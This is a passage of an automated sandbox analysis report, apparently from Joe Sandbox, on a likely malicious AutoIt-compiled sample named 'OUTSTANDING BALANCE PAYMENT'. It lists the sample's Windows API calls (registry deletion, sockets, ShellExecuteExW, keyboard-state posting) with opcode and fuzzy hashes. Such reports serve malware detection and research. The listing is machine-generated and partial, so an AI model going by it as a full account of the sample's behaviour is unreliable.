                                                                  • LoadStringW.USER32(00000000), ref: 002C6B6A
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002C6B80
                                                                  • LoadStringW.USER32(00000000), ref: 002C6B87
                                                                  • _wprintf.LIBCMT ref: 002C6BAD
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002C6BCB
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 002C6BA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: c34d47b621098bbd0a6efa096340dd234ebd5cbbee7a57edfce054edf396f103
                                                                  • Instruction ID: 80f5ed4aee5ca9cfa3ed6e928bff0d6f8dd40448a43947fddaa93fb92919a102
                                                                  • Opcode Fuzzy Hash: c34d47b621098bbd0a6efa096340dd234ebd5cbbee7a57edfce054edf396f103
                                                                  • Instruction Fuzzy Hash: 360131F6900218BFEB52ABE49D89FF777ACD708304F0045A6B746E2041EA749E848F75
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E2BF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 2595220575-0
                                                                  • Opcode ID: b47d602b143353e89827442ddb88f9e5e8a91bac3efbfcdd011018e9a5a37200
                                                                  • Instruction ID: ab9576020923af3eafce1e9555dfdf55382ef52a6292c3ce1f13d6ec723e1df1
                                                                  • Opcode Fuzzy Hash: b47d602b143353e89827442ddb88f9e5e8a91bac3efbfcdd011018e9a5a37200
                                                                  • Instruction Fuzzy Hash: 3C919935215201DFCB01EF55C891B6EB7E9BF88310F58885EF986972A1DB30E929CF42
                                                                  APIs
                                                                  • select.WSOCK32 ref: 002D9691
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D969E
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 002D96C8
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002D96E9
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D96F8
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 002D97AA
                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0031DC00), ref: 002D9765
                                                                    • Part of subcall function 002BD2FF: _strlen.LIBCMT ref: 002BD309
                                                                  • _strlen.LIBCMT ref: 002D9800
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                  • String ID:
                                                                  • API String ID: 3480843537-0
                                                                  • Opcode ID: c0f08f2d37a084fecd997c4fa5a3052593264a2502f70549604da82306f19003
                                                                  • Instruction ID: 7c91be2e2c9b001ebccb726dc3f546adc48b7e488fc9d046c77c50d15b3a6379
                                                                  • Opcode Fuzzy Hash: c0f08f2d37a084fecd997c4fa5a3052593264a2502f70549604da82306f19003
                                                                  • Instruction Fuzzy Hash: 1881EE31524201ABC710EF64CC95E6BB7E8EF85B18F104A1EF5559B2D2EB30DD24CBA2
                                                                  APIs
                                                                  • __mtinitlocknum.LIBCMT ref: 002AA991
                                                                    • Part of subcall function 002A7D7C: __FF_MSGBANNER.LIBCMT ref: 002A7D91
                                                                    • Part of subcall function 002A7D7C: __NMSG_WRITE.LIBCMT ref: 002A7D98
                                                                    • Part of subcall function 002A7D7C: __malloc_crt.LIBCMT ref: 002A7DB8
                                                                  • __lock.LIBCMT ref: 002AA9A4
                                                                  • __lock.LIBCMT ref: 002AA9F0
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00336DE0,00000018,002B5E7B,?,00000000,00000109), ref: 002AAA0C
                                                                  • EnterCriticalSection.KERNEL32(8000000C,00336DE0,00000018,002B5E7B,?,00000000,00000109), ref: 002AAA29
                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 002AAA39
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1422805418-0
                                                                  • Opcode ID: d03a52faa8a19a7a0beb433d1a05100ab607f3a37995acf3b81aff2a7bc75933
                                                                  • Instruction ID: 3144d2088a694c2eb54670f739412c7a7d7522f79e60ddb5ed18cf42aab94808
                                                                  • Opcode Fuzzy Hash: d03a52faa8a19a7a0beb433d1a05100ab607f3a37995acf3b81aff2a7bc75933
                                                                  • Instruction Fuzzy Hash: AC413871A206029BEB14DF68DA4575CB7F4AF03334F148219E525AB2E3DFB49860CF92
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 002E8EE4
                                                                  • GetDC.USER32(00000000), ref: 002E8EEC
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E8EF7
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 002E8F03
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 002E8F3F
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002E8F50
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 002E8F8A
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002E8FAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: 59359a96824bf1e3ee7a5b3a6edadb4d7b97a49a4cf2a510b87078627b2a9dc7
                                                                  • Instruction ID: 2326f4201fc0629891aedc37dbd5f41e2d5d627261a76e0db8f6cf0f283ea602
                                                                  • Opcode Fuzzy Hash: 59359a96824bf1e3ee7a5b3a6edadb4d7b97a49a4cf2a510b87078627b2a9dc7
                                                                  • Instruction Fuzzy Hash: C031AE72241214BFEB118F95CC5AFEB3BADEF49711F484065FE48DA191CAB69841CB70
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 002F016D
                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 002F038D
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002F03AB
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 002F03D6
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002F03FF
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 002F0421
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 002F0440
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                  • String ID:
                                                                  • API String ID: 3356174886-0
                                                                  • Opcode ID: 06cfe18315a33bccc3ded519cf26d4e7809a05cedf4f9d8a51187e21b21e3712
                                                                  • Instruction ID: cbc110fff578216640665fda1b466afaf8ccdde20161fe742c31bf7a96f10c82
                                                                  • Opcode Fuzzy Hash: 06cfe18315a33bccc3ded519cf26d4e7809a05cedf4f9d8a51187e21b21e3712
                                                                  • Instruction Fuzzy Hash: B4A1BF3561061AEBDB18CF68C9C57BDFBB1BF08780F048165EE54AB291D774AD60CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c810096e6b54d933945fccee703dfe8ad4daab8bb12056566b3f04c7c2d7b436
                                                                  • Instruction ID: d143d6aae378b0085cc327d90e185eec36332540da40e8de070d0a4652a68627
                                                                  • Opcode Fuzzy Hash: c810096e6b54d933945fccee703dfe8ad4daab8bb12056566b3f04c7c2d7b436
                                                                  • Instruction Fuzzy Hash: 79717E71910209EFCF15CF98CC49ABEBB78FF85314F248159F915AA251C771AA21CFA1
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002E225A
                                                                  • _memset.LIBCMT ref: 002E2323
                                                                  • ShellExecuteExW.SHELL32(?), ref: 002E2368
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                    • Part of subcall function 0029C6F4: _wcscpy.LIBCMT ref: 0029C717
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002E242F
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 002E243E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 4082843840-2766056989
                                                                  • Opcode ID: 65ecc29cc9488e4c94095bfe4dcd099c466e01f5a5761906dc84c20c0fa902c6
                                                                  • Instruction ID: 1211347e585836156d645b401e60aad06837416b2db231052e8d0b1734819d53
                                                                  • Opcode Fuzzy Hash: 65ecc29cc9488e4c94095bfe4dcd099c466e01f5a5761906dc84c20c0fa902c6
                                                                  • Instruction Fuzzy Hash: 78715975A20619DFCF05EFA5C8819AEB7B9FF48310F108059E856AB291CB34AD64CF90
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 002C3DE7
                                                                  • GetKeyboardState.USER32(?), ref: 002C3DFC
                                                                  • SetKeyboardState.USER32(?), ref: 002C3E5D
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 002C3E8B
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 002C3EAA
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 002C3EF0
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002C3F13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 84d70a7d5abd0cd8d55ff27c3edf51d838884aa90d888a202428a07f001c42b1
                                                                  • Instruction ID: 8d4971813e89d3794810effc6481b657efab23792d56566db6a77ab3812c2432
                                                                  • Opcode Fuzzy Hash: 84d70a7d5abd0cd8d55ff27c3edf51d838884aa90d888a202428a07f001c42b1
                                                                  • Instruction Fuzzy Hash: 8B5103A0A247D63DFB368A248C05FB67EA95F06304F088E8DE0D9468C2D3D49EE4D760
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 002C3C02
                                                                  • GetKeyboardState.USER32(?), ref: 002C3C17
                                                                  • SetKeyboardState.USER32(?), ref: 002C3C78
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002C3CA4
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002C3CC1
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002C3D05
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002C3D26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: dc0fb79eda9d552f8326e426a4cac4f013cb14fa6130cbead3ca28f1e4154769
                                                                  • Instruction ID: da6f40458cfc20b93a9f0c6f3a3546b1e1f65237acf3591af58785493645b441
                                                                  • Opcode Fuzzy Hash: dc0fb79eda9d552f8326e426a4cac4f013cb14fa6130cbead3ca28f1e4154769
                                                                  • Instruction Fuzzy Hash: E35126A05247D63DFB32DB248C15FBABF986B06304F0CCA8DE0DA564C2D695EEA4D750
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 2945705084-0
                                                                  • Opcode ID: 927b16fe917e7514dd02f0d6cf81b3e8262d250e138fe403f5c4b2e8a6462215
                                                                  • Instruction ID: 127cb8d55771cc5836c4f7e469de5756e61c74bd486d0698c90fad15da09673d
                                                                  • Opcode Fuzzy Hash: 927b16fe917e7514dd02f0d6cf81b3e8262d250e138fe403f5c4b2e8a6462215
                                                                  • Instruction Fuzzy Hash: 2C415466D24214B7DF10EBF4C886ACFB7AD9F06720F504966E514E3121FA34D6348BA5
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 002E3DA1
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E3DCB
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 002E3E80
                                                                    • Part of subcall function 002E3D72: RegCloseKey.ADVAPI32(?), ref: 002E3DE8
                                                                    • Part of subcall function 002E3D72: FreeLibrary.KERNEL32(?), ref: 002E3E3A
                                                                    • Part of subcall function 002E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002E3E5D
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 002E3E25
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 395352322-0
                                                                  • Opcode ID: 0cb3fc23daa23fff2d8a876a6e269f4a856ab5357982e66c923c8c9279bcd9c6
                                                                  • Instruction ID: 7fc7c26a22497f746159b238825dd49b953825e0dab28bbf34f99aee0d79f012
                                                                  • Opcode Fuzzy Hash: 0cb3fc23daa23fff2d8a876a6e269f4a856ab5357982e66c923c8c9279bcd9c6
                                                                  • Instruction Fuzzy Hash: C93137B1951109BFDB15CFD1DC89AFFB7BCEF08301F44016AA512A3150DA709F988AA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002E8FE7
                                                                  • GetWindowLongW.USER32(011F82B0,000000F0), ref: 002E901A
                                                                  • GetWindowLongW.USER32(011F82B0,000000F0), ref: 002E904F
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002E9081
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002E90AB
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 002E90BC
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002E90D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: d7b94253091e49df9099b2f13ef28cd29ba345b78294738a6b1ce0d50a9f7282
                                                                  • Instruction ID: 3f4b1def1a498d38364dc413e84a70dabf215ebabf85b477d3b89966eb93c802
                                                                  • Opcode Fuzzy Hash: d7b94253091e49df9099b2f13ef28cd29ba345b78294738a6b1ce0d50a9f7282
                                                                  • Instruction Fuzzy Hash: F73157742A02569FDB228F59DC84F6573A9FB4A314F950166F9088F2B2CB72A890CF40
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C08F2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C0918
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 002C091B
                                                                  • SysAllocString.OLEAUT32(?), ref: 002C0939
                                                                  • SysFreeString.OLEAUT32(?), ref: 002C0942
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 002C0967
                                                                  • SysAllocString.OLEAUT32(?), ref: 002C0975
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 52e74c52da79e249baac5f6745d6baf17bb10bc87197689c7c3da0aced5e05b4
                                                                  • Instruction ID: 601f8e6e1297467439d75d837f24115063fda6c6c5af3e2245705c8c2270f798
                                                                  • Opcode Fuzzy Hash: 52e74c52da79e249baac5f6745d6baf17bb10bc87197689c7c3da0aced5e05b4
                                                                  • Instruction Fuzzy Hash: D6219576611219AFEF109FA8DCC8EBB73ECEB09760B408626F915DB151DA70EC458B60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: 446858065ed530277f3e1c7248c42f76ad4ff2a3f02aa25562e219067004cf2d
                                                                  • Instruction ID: cb81977ee608231f8b8a2bf0f082e69b32370f48179bcc8e0ecb65d985ccc846
                                                                  • Opcode Fuzzy Hash: 446858065ed530277f3e1c7248c42f76ad4ff2a3f02aa25562e219067004cf2d
                                                                  • Instruction Fuzzy Hash: 64216A32130222A7D739BA249C12FB7739CEF65350FA0412DF445A7081EEA59975C3A0
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C09CB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C09F1
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 002C09F4
                                                                  • SysAllocString.OLEAUT32 ref: 002C0A15
                                                                  • SysFreeString.OLEAUT32 ref: 002C0A1E
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 002C0A38
                                                                  • SysAllocString.OLEAUT32(?), ref: 002C0A46
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
